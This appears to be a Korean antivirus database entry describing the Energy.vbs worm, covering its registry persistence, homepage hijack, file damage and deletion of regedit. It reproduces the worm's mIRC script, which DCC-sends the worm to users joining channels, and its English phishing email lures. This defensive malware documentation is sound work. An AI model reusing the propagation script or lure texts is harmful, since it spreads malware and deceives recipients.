바이러스 DB - 터보백신

※ 상세 설명: 이 바이러스를 실행하면 윈도우 폴더에 MSNetLog 와 윈도우 Command 폴더 에 Energy.vbs를 생성한다. 레지스트리에 아래와 같은 내용을 추가한다. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\Searc hMSN HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSNet Log 시작 홈페이지를 "http://vx.dirtyhosting.com"로 바 꾼다. mirc 가 설치되어 있으면 script.ini 를 아래와 같이 바꾼다. [script] ;MIRC Script By Ahamad Boby n0=on 1:JOIN:#:{ n1= /if ( $nick == $me ) { halt } n2= /.dcc send $nick "&windir&"\Command\Energy.vbs n3=} 아웃룩의 주소록에 등록되어 있는 사용자들에게 아래 의 내용중의 하나와 함 께 Energy.vbs 를 첨부하여 보낸다 제목 : Surprise 본문 : A nice surprise for you, check it out... 제목 : Great... 본문 : Great app, check it out.. 제목 : Important, Please Read 본문 : A paper I downloaded from Symantec about new virus, you should read it 제목 : Happy Birthday 본문 : A happy birthday surprise 제목 : Take a look... 본문 : Take a look and the app that chenge to a pic 제목 : Great Joke.. Read it 본문 : Read this joke, it is so great... ha ha 레지스트리를 수정하지 못하도록 regedit.exe 파일을 지운다. 2 일 10 일 20 일 28 일에 notepad.exe 를 계속 실행 시킨다. 시스템 폴더에서 확장자가 sys, dll, ocx 인 파일을 찾아 손상시킨다.

터보백신 개인용 TurboVaccine Introduce